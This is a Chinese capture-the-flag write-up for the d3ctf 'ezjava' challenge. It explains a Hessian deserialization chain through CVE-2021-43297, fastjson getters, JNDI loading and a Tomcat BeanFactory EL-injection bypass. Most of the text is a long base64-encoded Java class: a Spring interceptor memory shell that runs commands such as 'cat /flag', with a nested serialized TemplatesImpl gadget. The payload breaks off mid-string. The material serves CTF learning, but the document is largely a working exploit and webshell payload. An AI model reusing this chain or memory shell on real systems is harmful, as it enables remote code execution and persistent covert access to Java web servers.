d3ctf-ezjava

前言

这次的d3ctf 因为在五一假期有事,只看了一个题,还好做出来了,当时环境崩了不然可以一血可恶呀

之前出校赛题的时候正好对alipay的hessian有点研究,这次思路就比较顺畅,没想到还是打了一个非预期(

解题

思路其实很明显,通过register的反序列化拿下权限注入内存马,然后通过内存马修改/blacklist/jdk/get页面的返回值来对server造成反序列化完成攻击,首先的hessian反序列化处黑名单很多,ban了很多东西,那么就是需要找新类来利用了,首先就是equals到tostring的链,Xstring是在黑名单的,但是alipay的hessian是用的存在CVE-2021-43297的版本所以可以直接通过畸形数据完成到Tosting的调用,然后通过fastjson的tosting调用到任意类的getter方法,这里其实找一下就可以找到利用类是javax.naming.spi.ContinuationDirContext这个类是hessian原有链中就已经利用过的类,用来加载jndi Reference远程类的。但是在jdk版本 JDK 11.0.1、8u191、7u201、6u211后被限制所以这里使用org.apache.naming.factory.BeanFactory来完成绕过打el表达式注入内存马

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
String x = "var str='yv66vgAAADQA8QoANQB5CQB6AHsJADEAfAoAfQB+CgB/AIAIAIEKAH8AggoAgwCEBwCFCgAJAIYIAIcKAAkAiAoACQCJCgAJAIoIAIsLAIwAjQoAfQCOCACPCACQCACRCgCSAJMKAAkAlAgAlQgAlgsAlwCYCwCXAJkKAJoAmwoAmgCcCgCaAJ0LADYAngsANgCfCACgCgChAKIIAKMLAKQApQcApgcApwsAJACoBwCpCACqCgCrAKwHAK0KACoArgoArwCwCgCvALEHALIHALMKAC8ArgcAtAoAMQB5CwAuALUIALYHALcHALgBAARudW1zAQABSQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAkTGNvbS9qYXZhL3BheWxvYWRzL21hZ2ljSW50ZXJjZXB0b3I7AQAJcHJlSGFuZGxlAQBkKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDspWgEABGNvZGUBABJMamF2YS9sYW5nL1N0cmluZzsBAAZyZXN1bHQBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAHaGFuZGxlcgEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQABcwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAZvdXRwdXQBAA1TdGFja01hcFRhYmxlBwC5BwCFBwC6BwC0BwC7BwC8BwC3AQAKRXhjZXB0aW9ucwcAvQEACnBvc3RIYW5kbGUBAJIoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L01vZGVsQW5kVmlldzspVgEADG1vZGVsQW5kVmlldwEALkxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L01vZGVsQW5kVmlldzsBAA9hZnRlckNvbXBsZXRpb24BAHkoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvRXhjZXB0aW9uOylWAQACZXgBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAg8Y2xpbml0PgEAAWUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAIkxqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbjsBAAdjb250ZXh0AQA3TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0OwEAFW1hcHBpbmdIYW5kbGVyTWFwcGluZwEAVExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nOwEABWZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAEWFkYXB0SW50ZXJjZXB0b3JzAQAQTGphdmEvdXRpbC9MaXN0OwEAD2V2aWxJbnRlcmNlcHRvcgEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBAEZMamF2YS91dGlsL0xpc3Q8TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvSGFuZGxlckludGVyY2VwdG9yOz47BwCmBwCnBwC+BwCtBwCyBwCzAQAKU291cmNlRmlsZQEAFW1hZ2ljSW50ZXJjZXB0b3IuamF2YQwAOQA6BwC/DADAAMEMADcAOAcAwgwAwwDEBwDFDADGAMcBAAljYXQgL2ZsYWcMAMgAyQcAygwAywDMAQARamF2YS91dGlsL1NjYW5uZXIMADkAzQEAAlxBDADOAM8MANAA0QwA0gDTAQAABwC7DADUANMMAMMA1QEnU3siY29kZSI6IjIwMCIsIm1lc3NhZ2UiOiJyTzBBQlhOeUFCRnFZWFpoTG5WMGFXd3VTR0Z6YUUxaGNBVUgyc0hERm1EUkF3QUNSZ0FLYkc5aFpFWmhZM1J2Y2trQUNYUm9jbVZ6YUc5c1pIaHdQMEFBQUFBQUFBQjNDQUFBQUFJQUFBQUNjM0VBZmdBQVAwQUFBQUFBQUF4M0NBQUFBQkFBQUFBQ2RBQUNlWGx6Y2dBZlkyOXRMbUZzYVdKaFltRXVabUZ6ZEdwemIyNHlMa3BUVDA1QmNuSmhlUUFBQUFBQUFBQUJBZ0FBZUhJQUUycGhkbUV1ZFhScGJDNUJjbkpoZVV4cGMzUjRnZElkbWNkaG5RTUFBVWtBQkhOcGVtVjRjQUFBQUFGM0JBQUFBQUZ6Y2dBNlkyOXRMbk4xYmk1dmNtY3VZWEJoWTJobExuaGhiR0Z1TG1sdWRHVnlibUZzTG5oemJIUmpMblJ5WVhndVZHVnRjR3hoZEdWelNXMXdiQWxYVDhGdXJLc3pBd0FHU1FBTlgybHVaR1Z1ZEU1MWJXSmxja2tBRGw5MGNtRnVjMnhsZEVsdVpHVjRXd0FLWDJKNWRHVmpiMlJsYzNRQUExdGJRbHNBQmw5amJHRnpjM1FBRWx0TWFtRjJZUzlzWVc1bkwwTnNZWE56TzB3QUJWOXVZVzFsZEFBU1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN1RBQVJYMjkxZEhCMWRGQnliM0JsY25ScFpYTjBBQlpNYW1GMllTOTFkR2xzTDFCeWIzQmxjblJwWlhNN2VIQUFBQUFBLy8vLy8zVnlBQU5iVzBKTC9Sa1ZaMmZiTndJQUFIaHdBQUFBQVhWeUFBSmJRcXp6Ri9nR0NGVGdBZ0FBZUhBQUFCb015djY2dmdBQUFEUUJNd29BUUFDWENBQ1lDQUNaQ2dDYUFKc0tBSm9BbkFvQW5RQ2VDUUNmQUtBSkFEd0FvUW9Bb2dDakNnQ2tBS1VJQUtZS0FLUUFwd29BcUFDcEJ3Q3FDZ0FPQUtzSUFLd0tBQTRBclFvQURnQ3VDZ0FPQUs4S0FLSUFzQWNBc1FvQUZRQ1hDQUN5Q2dBVkFMTUtBTFFBdFFvQXRnQzNDZ0M0QUxrSUFMb0tBQlVBdXdzQXZBQzlDQUMrQ2dDMkFMOEtBQTRBd0FnQXdRZ0F3Z3NBd3dERUN3RERBTVVLQU1ZQXh3b0F4Z0RJQ2dER0FNa0xBRUVBeWdzQVFRRExDQURNQ2dETkFNNElBTThMQU5BQTBRY0EwZ2NBMHdzQUx3RFVCd0RWQ0FEV0NnRFhBTmdIQU5rS0FEVUEyZ29BMndEY0NnRGJBTjBIQU40SEFOOEtBRG9BMmdjQTRBb0FQQUNYQ3dBNUFPRUlBT0lIQU9NSEFPUUJBQVJ1ZFcxekFRQUJTUUVBQmp4cGJtbDBQZ0VBQXlncFZnRUFCRU52WkdVQkFBOU1hVzVsVG5WdFltVnlWR0ZpYkdVQkFCSk1iMk5oYkZaaGNtbGhZbXhsVkdGaWJHVUJBQVIwYUdsekFRQW1UR052YlM5amRHWXZaWHB6WlhJdmRYUnBiSE12YldGbmFXTkpiblJsY21ObGNIUnZjanNCQUF4eVpYQnNZV05sUW14aGJtc0JBQ1lvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3dFQUFYQUJBQmxNYW1GMllTOTFkR2xzTDNKbFoyVjRMMUJoZEhSbGNtNDdBUUFCYlFFQUdVeHFZWFpoTDNWMGFXd3ZjbVZuWlhndlRXRjBZMmhsY2pzQkFBTnpkSElCQUJKTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBUmtaWE4wQVFBTlUzUmhZMnROWVhCVVlXSnNaUWNBNVFFQUNYQnlaVWhoYm1Sc1pRRUFaQ2hNYW1GMllYZ3ZjMlZ5ZG14bGRDOW9kSFJ3TDBoMGRIQlRaWEoyYkdWMFVtVnhkV1Z6ZER0TWFtRjJZWGd2YzJWeWRteGxkQzlvZEhSd0wwaDBkSEJUWlhKMmJHVjBVbVZ6Y0c5dWMyVTdUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVm9CQUFaeVpYTjFiSFFCQUFkeVpYRjFaWE4wQVFBblRHcGhkbUY0TDNObGNuWnNaWFF2YUhSMGNDOUlkSFJ3VTJWeWRteGxkRkpsY1hWbGMzUTdBUUFJY21WemNHOXVjMlVCQUNoTWFtRjJZWGd2YzJWeWRteGxkQzlvZEhSd0wwaDBkSEJUWlhKMmJHVjBVbVZ6Y0c5dWMyVTdBUUFIYUdGdVpHeGxjZ0VBRWt4cVlYWmhMMnhoYm1jdlQySnFaV04wT3dFQUJHTnZaR1VCQUFKcGJnRUFGVXhxWVhaaEwybHZMMGx1Y0hWMFUzUnlaV0Z0T3dFQUFYTUJBQk5NYW1GMllTOTFkR2xzTDFOallXNXVaWEk3QVFBR2IzVjBjSFYwQndEbUJ3Q3FCd0RnQndEbkJ3RG9Cd0RwQVFBS1JYaGpaWEIwYVc5dWN3Y0E2Z0VBQ25CdmMzUklZVzVrYkdVQkFKSW9UR3BoZG1GNEwzTmxjblpzWlhRdmFIUjBjQzlJZEhSd1UyVnlkbXhsZEZKbGNYVmxjM1E3VEdwaGRtRjRMM05sY25ac1pYUXZhSFIwY0M5SWRIUndVMlZ5ZG14bGRGSmxjM0J2Ym5ObE8weHFZWFpoTDJ4aGJtY3ZUMkpxWldOME8weHZjbWN2YzNCeWFXNW5abkpoYldWM2IzSnJMM2RsWWk5elpYSjJiR1YwTDAxdlpHVnNRVzVrVm1sbGR6c3BWZ0VBREcxdlpHVnNRVzVrVm1sbGR3RUFMa3h2Y21jdmMzQnlhVzVuWm5KaGJXVjNiM0pyTDNkbFlpOXpaWEoyYkdWMEwwMXZaR1ZzUVc1a1ZtbGxkenNCQUE5aFpuUmxja052YlhCc1pYUnBiMjRCQUhrb1RHcGhkbUY0TDNObGNuWnNaWFF2YUhSMGNDOUlkSFJ3VTJWeWRteGxkRkpsY1hWbGMzUTdUR3BoZG1GNEwzTmxjblpzWlhRdmFIUjBjQzlJZEhSd1UyVnlkbXhsZEZKbGMzQnZibk5sTzB4cVlYWmhMMnhoYm1jdlQySnFaV04wTzB4cVlYWmhMMnhoYm1jdlJYaGpaWEIwYVc5dU95bFdBUUFDWlhnQkFCVk1hbUYyWVM5c1lXNW5MMFY0WTJWd2RHbHZianNCQUFsMGNtRnVjMlp2Y20wQkFISW9UR052YlM5emRXNHZiM0puTDJGd1lXTm9aUzk0WVd4aGJpOXBiblJsY201aGJDOTRjMngwWXk5RVQwMDdXMHhqYjIwdmMzVnVMMjl5Wnk5aGNHRmphR1V2ZUcxc0wybHVkR1Z5Ym1Gc0wzTmxjbWxoYkdsNlpYSXZVMlZ5YVdGc2FYcGhkR2x2YmtoaGJtUnNaWEk3S1ZZQkFBaGtiMk4xYldWdWRBRUFMVXhqYjIwdmMzVnVMMjl5Wnk5aGNHRmphR1V2ZUdGc1lXNHZhVzUwWlhKdVlXd3ZlSE5zZEdNdlJFOU5Pd0VBQ0doaGJtUnNaWEp6QVFCQ1cweGpiMjB2YzNWdUwyOXlaeTloY0dGamFHVXZlRzFzTDJsdWRHVnlibUZzTDNObGNtbGhiR2w2WlhJdlUyVnlhV0ZzYVhwaGRHbHZia2hoYm1Sc1pYSTdCd0RyQVFDbUtFeGpiMjB2YzNWdUwyOXlaeTloY0dGamFHVXZlR0ZzWVc0dmFXNTBaWEp1WVd3dmVITnNkR012UkU5Tk8weGpiMjB2YzNWdUwyOXlaeTloY0dGamFHVXZlRzFzTDJsdWRHVnlibUZzTDJSMGJTOUVWRTFCZUdselNYUmxjbUYwYjNJN1RHTnZiUzl6ZFc0dmIzSm5MMkZ3WVdOb1pTOTRiV3d2YVc1MFpYSnVZV3d2YzJWeWFXRnNhWHBsY2k5VFpYSnBZV3hwZW1GMGFXOXVTR0Z1Wkd4bGNqc3BWZ0VBQ0dsMFpYSmhkRzl5QVFBMVRHTnZiUzl6ZFc0dmIzSm5MMkZ3WVdOb1pTOTRiV3d2YVc1MFpYSnVZV3d2WkhSdEwwUlVUVUY0YVhOSmRHVnlZWFJ2Y2pzQkFFRk1ZMjl0TDNOMWJpOXZjbWN2WVhCaFkyaGxMM2h0YkM5cGJuUmxjbTVoYkM5elpYSnBZV3hwZW1WeUwxTmxjbWxoYkdsNllYUnBiMjVJWVc1a2JHVnlPd0VBQ0R4amJHbHVhWFErQVFBQlpRRUFJRXhxWVhaaEwyeGhibWN2VG05VGRXTm9SbWxsYkdSRmVHTmxjSFJwYjI0N0FRQWlUR3BoZG1FdmJHRnVaeTlKYkd4bFoyRnNRV05qWlhOelJYaGpaWEIwYVc5dU93RUFCMk52Ym5SbGVIUUJBRGRNYjNKbkwzTndjbWx1WjJaeVlXMWxkMjl5YXk5M1pXSXZZMjl1ZEdWNGRDOVhaV0pCY0hCc2FXTmhkR2x2YmtOdmJuUmxlSFE3QVFBVmJXRndjR2x1WjBoaGJtUnNaWEpOWVhCd2FXNW5BUUJVVEc5eVp5OXpjSEpwYm1kbWNtRnRaWGR2Y21zdmQyVmlMM05sY25ac1pYUXZiWFpqTDIxbGRHaHZaQzloYm01dmRHRjBhVzl1TDFKbGNYVmxjM1JOWVhCd2FXNW5TR0Z1Wkd4bGNrMWhjSEJwYm1jN0FRQUZabWxsYkdRQkFCbE1hbUYyWVM5c1lXNW5MM0psWm14bFkzUXZSbWxsYkdRN0FRQVJZV1JoY0hSSmJuUmxjbU5sY0hSdmNuTUJBQkJNYW1GMllTOTFkR2xzTDB4cGMzUTdBUUFQWlhacGJFbHVkR1Z5WTJWd2RHOXlBUUFXVEc5allXeFdZWEpwWVdKc1pWUjVjR1ZVWVdKc1pRRUFSa3hxWVhaaEwzVjBhV3d2VEdsemREeE1iM0puTDNOd2NtbHVaMlp5WVcxbGQyOXlheTkzWldJdmMyVnlkbXhsZEM5SVlXNWtiR1Z5U1c1MFpYSmpaWEIwYjNJN1Bqc0hBTklIQU5NSEFPd0hBTmtIQU40SEFOOEJBQXBUYjNWeVkyVkdhV3hsQVFBVmJXRm5hV05KYm5SbGNtTmxjSFJ2Y2k1cVlYWmhEQUJFQUVVQkFBQUJBQWxjY3lwOENYd05mQW9IQU8wTUFPNEE3d3dBOEFEeEJ3RHlEQUR6QUV3SEFQUU1BUFVBOWd3QVFnQkRCd0QzREFENEFQa0hBUG9NQVBzQS9BRUFER3h6SUMxaGJDQXZjbTl2ZEF3QS9RRCtCd0QvREFFQUFRRUJBQkZxWVhaaEwzVjBhV3d2VTJOaGJtNWxjZ3dBUkFFQ0FRQUNYRUVNQVFNQkJBd0JCUUVHREFFSEFRZ01BUGdCQ1FFQUYycGhkbUV2YkdGdVp5OVRkSEpwYm1kQ2RXbHNaR1Z5QVFBWmV5SmpiMlJsSWpvaU1qQXdJaXdpYldWemMyRm5aU0k2SWd3QkNnRUxCd0VNREFFTkFSQUhBT1VNQVJFQkVnY0JFd3dCRkFFVkFRQUNJbjBNQVJZQkNBY0E1d3dCRndFSUFRQUhMM04wWVhSMWN3d0JHQUVaREFCRUFRa0JBQXhEYjI1MFpXNTBMVlI1Y0dVQkFCNWhjSEJzYVdOaGRHbHZiaTlxYzI5dU8yTm9ZWEp6WlhROVZWUkdMVGdIQU9nTUFSb0JHd3dCSEFFZEJ3RWVEQUVmQVFrTUFTQUFSUXdCSVFCRkRBQnRBRzRNQUhFQWNnRUFCbk4wWVdGeWRBY0JJZ3dCSXdFa0FRQTViM0puTG5Od2NtbHVaMlp5WVcxbGQyOXlheTUzWldJdWMyVnlkbXhsZEM1RWFYTndZWFJqYUdWeVUyVnlkbXhsZEM1RFQwNVVSVmhVQndFbERBRW1BU2NCQURWdmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwzZGxZaTlqYjI1MFpYaDBMMWRsWWtGd2NHeHBZMkYwYVc5dVEyOXVkR1Y0ZEFFQVVtOXlaeTl6Y0hKcGJtZG1jbUZ0WlhkdmNtc3ZkMlZpTDNObGNuWnNaWFF2YlhaakwyMWxkR2h2WkM5aGJtNXZkR0YwYVc5dUwxSmxjWFZsYzNSTllYQndhVzVuU0dGdVpHeGxjazFoY0hCcGJtY01BU2dCS1FFQVBtOXlaeTl6Y0hKcGJtZG1jbUZ0WlhkdmNtc3ZkMlZpTDNObGNuWnNaWFF2YUdGdVpHeGxjaTlCWW5OMGNtRmpkRWhoYm1Sc1pYSk5ZWEJ3YVc1bkFRQVRZV1JoY0hSbFpFbHVkR1Z5WTJWd2RHOXljd2NCS2d3Qkt3RXNBUUFlYW1GMllTOXNZVzVuTDA1dlUzVmphRVpwWld4a1JYaGpaWEIwYVc5dURBRXRBRVVIQU93TUFTNEJMd3dCTUFFeEFRQU9hbUYyWVM5MWRHbHNMMHhwYzNRQkFDQnFZWFpoTDJ4aGJtY3ZTV3hzWldkaGJFRmpZMlZ6YzBWNFkyVndkR2x2YmdFQUpHTnZiUzlqZEdZdlpYcHpaWEl2ZFhScGJITXZiV0ZuYVdOSmJuUmxjbU5sY0hSdmNnd0JNZ0VaQVFBQ2Iyc0JBRUJqYjIwdmMzVnVMMjl5Wnk5aGNHRmphR1V2ZUdGc1lXNHZhVzUwWlhKdVlXd3ZlSE5zZEdNdmNuVnVkR2x0WlM5QlluTjBjbUZqZEZSeVlXNXpiR1YwQVFBeWIzSm5MM053Y21sdVoyWnlZVzFsZDI5eWF5OTNaV0l2YzJWeWRteGxkQzlJWVc1a2JHVnlTVzUwWlhKalpYQjBiM0lCQUJCcVlYWmhMMnhoYm1jdlUzUnlhVzVuQVFBVGFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJRRUFKV3BoZG1GNEwzTmxjblpzWlhRdmFIUjBjQzlJZEhSd1UyVnlkbXhsZEZKbGNYVmxjM1FCQUNacVlYWmhlQzl6WlhKMmJHVjBMMmgwZEhBdlNIUjBjRk5sY25ac1pYUlNaWE53YjI1elpRRUFFR3BoZG1FdmJHRnVaeTlQWW1wbFkzUUJBQk5xWVhaaEwyeGhibWN2UlhoalpYQjBhVzl1QVFBNVkyOXRMM04xYmk5dmNtY3ZZWEJoWTJobEwzaGhiR0Z1TDJsdWRHVnlibUZzTDNoemJIUmpMMVJ5WVc1emJHVjBSWGhqWlhCMGFXOXVBUUFYYW1GMllTOXNZVzVuTDNKbFpteGxZM1F2Um1sbGJHUUJBQmRxWVhaaEwzVjBhV3d2Y21WblpYZ3ZVR0YwZEdWeWJnRUFCMk52YlhCcGJHVUJBQzBvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1V4cVlYWmhMM1YwYVd3dmNtVm5aWGd2VUdGMGRHVnlianNCQUFkdFlYUmphR1Z5QVFBektFeHFZWFpoTDJ4aGJtY3ZRMmhoY2xObGNYVmxibU5sT3lsTWFtRjJZUzkxZEdsc0wzSmxaMlY0TDAxaGRHTm9aWEk3QVFBWGFtRjJZUzkxZEdsc0wzSmxaMlY0TDAxaGRHTm9aWElCQUFweVpYQnNZV05sUVd4c0FRQVFhbUYyWVM5c1lXNW5MMU41YzNSbGJRRUFBMjkxZEFFQUZVeHFZWFpoTDJsdkwxQnlhVzUwVTNSeVpXRnRPd0VBRTJwaGRtRXZhVzh2VUhKcGJuUlRkSEpsWVcwQkFBZHdjbWx1ZEd4dUFRQUVLRWtwVmdFQUVXcGhkbUV2YkdGdVp5OVNkVzUwYVcxbEFRQUtaMlYwVW5WdWRHbHRaUUVBRlNncFRHcGhkbUV2YkdGdVp5OVNkVzUwYVcxbE93RUFCR1Y0WldNQkFDY29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VUhKdlkyVnpjenNCQUJGcVlYWmhMMnhoYm1jdlVISnZZMlZ6Y3dFQURtZGxkRWx1Y0hWMFUzUnlaV0Z0QVFBWEtDbE1hbUYyWVM5cGJ5OUpibkIxZEZOMGNtVmhiVHNCQUJnb1RHcGhkbUV2YVc4dlNXNXdkWFJUZEhKbFlXMDdLVllCQUF4MWMyVkVaV3hwYldsMFpYSUJBQ2NvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1V4cVlYWmhMM1YwYVd3dlUyTmhibTVsY2pzQkFBZG9ZWE5PWlhoMEFRQURLQ2xhQVFBRWJtVjRkQUVBRkNncFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQVZLRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxXQVFBR1lYQndaVzVrQVFBdEtFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bE1hbUYyWVM5c1lXNW5MMU4wY21sdVowSjFhV3hrWlhJN0FRQVFhbUYyWVM5MWRHbHNMMEpoYzJVMk5BRUFDbWRsZEVWdVkyOWtaWElCQUFkRmJtTnZaR1Z5QVFBTVNXNXVaWEpEYkdGemMyVnpBUUFjS0NsTWFtRjJZUzkxZEdsc0wwSmhjMlUyTkNSRmJtTnZaR1Z5T3dFQUNHZGxkRUo1ZEdWekFRQUVLQ2xiUWdFQUdHcGhkbUV2ZFhScGJDOUNZWE5sTmpRa1JXNWpiMlJsY2dFQURtVnVZMjlrWlZSdlUzUnlhVzVuQVFBV0tGdENLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5Pd0VBQ0hSdlUzUnlhVzVuQVFBTloyVjBVbVZ4ZFdWemRGVlNTUUVBQm1WeGRXRnNjd0VBRlNoTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzcFdnRUFDV0ZrWkVobFlXUmxjZ0VBSnloTWFtRjJZUzlzWVc1bkwxTjBjbWx1Wnp0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFZnRUFDV2RsZEZkeWFYUmxjZ0VBRnlncFRHcGhkbUV2YVc4dlVISnBiblJYY21sMFpYSTdBUUFUYW1GMllTOXBieTlRY21sdWRGZHlhWFJsY2dFQUJYZHlhWFJsQVFBRlpteDFjMmdCQUFWamJHOXpaUUVBUEc5eVp5OXpjSEpwYm1kbWNtRnRaWGR2Y21zdmQyVmlMMk52Ym5SbGVIUXZjbVZ4ZFdWemRDOVNaWEYxWlhOMFEyOXVkR1Y0ZEVodmJHUmxjZ0VBR0dOMWNuSmxiblJTWlhGMVpYTjBRWFIwY21saWRYUmxjd0VBUFNncFRHOXlaeTl6Y0hKcGJtZG1jbUZ0WlhkdmNtc3ZkMlZpTDJOdmJuUmxlSFF2Y21WeGRXVnpkQzlTWlhGMVpYTjBRWFIwY21saWRYUmxjenNCQURsdmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwzZGxZaTlqYjI1MFpYaDBMM0psY1hWbGMzUXZVbVZ4ZFdWemRFRjBkSEpwWW5WMFpYTUJBQXhuWlhSQmRIUnlhV0oxZEdVQkFDY29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdTU2xNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNCQUFkblpYUkNaV0Z1QVFBbEtFeHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0tVeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFEMnBoZG1FdmJHRnVaeTlEYkdGemN3RUFFR2RsZEVSbFkyeGhjbVZrUm1sbGJHUUJBQzBvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1V4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5R2FXVnNaRHNCQUE5d2NtbHVkRk4wWVdOclZISmhZMlVCQUExelpYUkJZMk5sYzNOcFlteGxBUUFFS0ZvcFZnRUFBMmRsZEFFQUppaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdBUUFEWVdSa0FDRUFQQUJBQUFFQVFRQUJBQWtBUWdCREFBQUFDQUFCQUVRQVJRQUJBRVlBQUFBdkFBRUFBUUFBQUFVcXR3QUJzUUFBQUFJQVJ3QUFBQVlBQVFBQUFDVUFTQUFBQUF3QUFRQUFBQVVBU1FCS0FBQUFDUUJMQUV3QUFRQkdBQUFBaGdBQ0FBUUFBQUFjRWdKTUtzWUFGaElEdUFBRVRTd3F0Z0FGVGkwU0FyWUFCa3dyc0FBQUFBTUFSd0FBQUJvQUJnQUFBRDhBQXdCQkFBY0FRd0FOQUVVQUV3QkhBQm9BU3dCSUFBQUFLZ0FFQUEwQURRQk5BRTRBQWdBVEFBY0FUd0JRQUFNQUFBQWNBRkVBVWdBQUFBTUFHUUJUQUZJQUFRQlVBQUFBQ0FBQi9BQWFCd0JWQUFFQVZnQlhBQUlBUmdBQUFhRUFBd0FKQUFBQXVySUFCN0lBQ0xZQUNiZ0FDaElMdGdBTXRnQU5PZ1c3QUE1WkdRVzNBQThTRUxZQUVUb0dHUWEyQUJLWkFBc1pCcllBRTZjQUJSSUNPZ2V5QUFjWkI3WUFGTHNBRlZtM0FCWVNGN1lBR0xnQUdSa0h0Z0FhdGdBYnRnQVlFaHkyQUJpMkFCMDZCQ3U1QUI0QkFCSWZ0Z0FnbVFCSHV3QU9XUmtFdHdBaEVoQzJBQkcyQUJNNkNDd1NJaElqdVFBa0F3QXN1UUFsQVFBWkNMWUFKaXk1QUNVQkFMWUFKeXk1QUNVQkFMWUFLTElBQ0FSZ3N3QUlBNndFckFBQUFBTUFSd0FBQUQ0QUR3QUFBRlFBQ1FCWUFCWUFXUUFtQUZvQU9nQmlBRUlBWlFCbUFHMEFkQUJ1QUljQWNnQ1JBSE1BbkFCMEFLVUFkUUN1QUhZQXRnQjNBTGdBakFCSUFBQUFYQUFKQUljQU1RQllBRklBQ0FBQUFMb0FTUUJLQUFBQUFBQzZBRmtBV2dBQkFBQUF1Z0JiQUZ3QUFnQUFBTG9BWFFCZUFBTUFaZ0JVQUY4QVVnQUVBQllBcEFCZ0FHRUFCUUFtQUpRQVlnQmpBQVlBT2dDQUFHUUFVZ0FIQUZRQUFBQXZBQVArQURZQUJ3QmxCd0JtUVFjQVZmOEFmd0FJQndCbkJ3Qm9Cd0JwQndCcUJ3QlZCd0JsQndCbUJ3QlZBQUFBYXdBQUFBUUFBUUJzQUFFQWJRQnVBQUlBUmdBQUFHQUFCUUFGQUFBQUNpb3JMQzBaQkxjQUtiRUFBQUFDQUVjQUFBQUtBQUlBQUFDUkFBa0FrZ0JJQUFBQU5BQUZBQUFBQ2dCSkFFb0FBQUFBQUFvQVdRQmFBQUVBQUFBS0FGc0FYQUFDQUFBQUNnQmRBRjRBQXdBQUFBb0Fid0J3QUFRQWF3QUFBQVFBQVFCc0FBRUFjUUJ5QUFJQVJnQUFBR0FBQlFBRkFBQUFDaW9yTEMwWkJMY0FLckVBQUFBQ0FFY0FBQUFLQUFJQUFBQ1dBQWtBbHdCSUFBQUFOQUFGQUFBQUNnQkpBRW9BQUFBQUFBb0FXUUJhQUFFQUFBQUtBRnNBWEFBQ0FBQUFDZ0JkQUY0QUF3QUFBQW9BY3dCMEFBUUFhd0FBQUFRQUFRQnNBQUVBZFFCMkFBSUFSZ0FBQUQ4QUFBQURBQUFBQWJFQUFBQUNBRWNBQUFBR0FBRUFBQUNjQUVnQUFBQWdBQU1BQUFBQkFFa0FTZ0FBQUFBQUFRQjNBSGdBQVFBQUFBRUFlUUI2QUFJQWF3QUFBQVFBQVFCN0FBRUFkUUI4QUFJQVJnQUFBRWtBQUFBRUFBQUFBYkVBQUFBQ0FFY0FBQUFHQUFFQUFBQ2hBRWdBQUFBcUFBUUFBQUFCQUVrQVNnQUFBQUFBQVFCM0FIZ0FBUUFBQUFFQWZRQitBQUlBQUFBQkFGMEFmd0FEQUdzQUFBQUVBQUVBZXdBSUFJQUFSUUFCQUVZQUFBRnhBQU1BQlFBQUFHNEVzd0FJc2dBSEVpdTJBQlM0QUN3U0xRTzVBQzREQU1BQUwwc3FFakM1QURFQ0FNQUFNRXdCVFJJeUVqTzJBRFJOcHdBSVRpMjJBRFlzQkxZQU53Rk9MQ3UyQURqQUFEbE9wd0FLT2dRWkJMWUFPN3NBUEZtM0FEMDZCQzBaQkxrQVBnSUFWN0lBQnhJL